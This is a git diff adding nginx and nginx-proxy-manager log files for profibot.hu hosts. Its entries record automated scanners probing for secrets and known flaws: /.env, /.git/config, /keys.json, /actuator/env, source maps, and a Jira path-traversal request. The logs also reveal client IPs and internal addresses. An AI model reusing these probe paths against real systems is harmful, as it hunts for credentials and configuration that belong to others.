request: "GET /build/bundle.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32864 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32869 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32876 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /page-data/app-data.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32861 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32883 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_app/immutable/entry/start.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32870 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_astro/client.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32881 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32877 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/webpack.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32873 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.svelte-kit/output/client/_app/env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32845 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /stripe.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32890 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32891 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32888 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/client.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32886 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /vendor.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32885 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /service-worker.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32889 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /src/env.d.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32887 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /__ENV.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32776 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_nuxt/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32786 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_nuxt/app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32784 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32804 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/development/pages/_app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32788 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32799 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /runtime.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32777 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/webpack.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32794 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32805 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32771 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /runtime.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32774 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32809 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /constants.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32790 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32779 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32811 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /checkout.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32812 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /settings.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32825 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/main.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32818 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/2.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32782 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32785 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /config/env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32819 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /src/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32822 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /src/constants.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32787 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/3.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32807 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /__config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32816 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /webpack-runtime.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32814 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /runtime~main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32796 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /api/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32823 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /api/settings HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32783 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /checkout HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32795 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /donate HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32780 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /index.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32820 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /payment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32827 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /env-config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32821 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /serviceworker.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32826 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32829 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /vite.config.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32801 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/page-data/app-data.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32853 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/commons.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32824 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/qwik-loader.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32842 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /@vite/env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32832 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /remix.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32837 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/framework.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32828 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /astro.config.mjs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32817 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.vite/deps/_metadata.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32839 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/polyfills.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32843 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/2.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32835 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/_ssgManifest.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32841 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /@vite/client HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32857 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/static/js/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32852 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32834 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/vendor.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32840 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /webpack.runtime.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32860 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /svelte.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32833 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.env.vite HTTP/1.1", host: "terminal.profibot.hu" +2026/01/29 06:43:41 [warn] 357#357: *36566 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/73/0000015733 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/shell/shell.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/shell/shell.js", host: "terminal.profibot.hu" +2026/01/29 06:43:42 [warn] 356#356: *36571 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/73/0000015734 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/system/overview.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/system/overview.js", host: "terminal.profibot.hu" +2026/01/29 06:43:42 [warn] 356#356: *36572 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/73/0000015735 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/updates/updates.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/updates/updates.js", host: "terminal.profibot.hu" +2026/01/29 08:59:41 [warn] 359#359: *36762 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/73/0000015736 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/shell/shell.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/shell/shell.js", host: "terminal.profibot.hu" +2026/01/29 08:59:41 [warn] 356#356: *36747 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/73/0000015737 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/updates/updates.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/updates/updates.js", host: "terminal.profibot.hu" +2026/01/29 08:59:41 [warn] 356#356: *36748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/73/0000015738 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/system/services.css HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/system/services.css", host: "terminal.profibot.hu" +2026/01/29 08:59:41 [warn] 359#359: *36762 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/73/0000015739 while reading upstream, client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /cockpit/@localhost/system/overview.js HTTP/1.1", upstream: "https://192.168.100.43:9090/cockpit/@localhost/system/overview.js", host: "terminal.profibot.hu" +2026/01/30 09:13:41 [warn] 231#231: *9462 using uninitialized "server" variable while logging request, client: 208.84.101.251, server: terminal.profibot.hu diff --git a/proxy-manager/data/logs/proxy-host-11_access.log b/proxy-manager/data/logs/proxy-host-11_access.log new file mode 100755 index 0000000..6868b1c --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-11_access.log @@ -0,0 +1,951 @@ +[31/Jan/2026:10:05:34 +0000] - - 400 - GET http net.profibot.hu "/" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:34 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 104.164.173.239] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:05:34 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:35 +0000] - - 400 - GET http net.profibot.hu "/server" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:36 +0000] - 502 502 - GET http net.profibot.hu "/server" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:36 +0000] - - 400 - GET http net.profibot.hu "/server-status" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:37 +0000] - 502 502 - GET http net.profibot.hu "/server-status" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:38 +0000] - - 400 - GET http net.profibot.hu "/about" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:39 +0000] - 502 502 - GET http net.profibot.hu "/about" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:39 +0000] - - 400 - GET http net.profibot.hu "/login.action" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:40 +0000] - 502 502 - GET http net.profibot.hu "/login.action" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:40 +0000] - - 400 - GET http net.profibot.hu "/v2/_catalog" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:40 +0000] - - 400 - GET http net.profibot.hu "/.DS_Store" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:40 +0000] - 502 502 - GET http net.profibot.hu "/v2/_catalog" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:41 +0000] - 502 502 - GET http net.profibot.hu "/.DS_Store" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:41 +0000] - - 400 - GET http net.profibot.hu "/.env" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:42 +0000] - 502 502 - GET http net.profibot.hu "/.env" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:43 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 51.81.245.138] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:05:43 +0000] - - 400 - GET http net.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:44 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 51.81.245.138] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "python-requests/2.25.1" "-" +[31/Jan/2026:10:05:44 +0000] - 502 502 - GET http net.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:45 +0000] - - 400 - GET http net.profibot.hu "/.git/config" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:46 +0000] - 502 502 - GET http net.profibot.hu "/.git/config" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:46 +0000] - - 400 - POST http net.profibot.hu "/graphql" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:46 +0000] - - 400 - POST http net.profibot.hu "/api" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:46 +0000] - - 400 - POST http net.profibot.hu "/api/graphql" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:46 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 104.164.173.16] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:05:47 +0000] - - 400 - POST http net.profibot.hu "/graphql/api" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:47 +0000] - - 400 - POST http net.profibot.hu "/api/gql" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:47 +0000] - - 400 - GET http net.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:47 +0000] - 502 502 - POST http net.profibot.hu "/graphql" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:48 +0000] - 502 502 - POST http net.profibot.hu "/api" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:48 +0000] - 502 502 - POST http net.profibot.hu "/api/graphql" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:48 +0000] - - 400 - GET http net.profibot.hu "/config.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:48 +0000] - 502 502 - POST http net.profibot.hu "/graphql/api" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:49 +0000] - 502 502 - POST http net.profibot.hu "/api/gql" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:49 +0000] - 502 502 - GET http net.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:50 +0000] - 502 502 - GET http net.profibot.hu "/config.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:50 +0000] - - 400 - GET http net.profibot.hu "/telescope/requests" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:50 +0000] - - 400 - GET http net.profibot.hu "/info.php" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:51 +0000] - - 400 - GET http net.profibot.hu "/.well-known/security.txt" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:52 +0000] - 502 502 - GET http net.profibot.hu "/telescope/requests" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:52 +0000] - - 400 - GET http net.profibot.hu "/actuator/env" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:52 +0000] - 502 502 - GET http net.profibot.hu "/info.php" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:53 +0000] - 502 502 - GET http net.profibot.hu "/.well-known/security.txt" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] 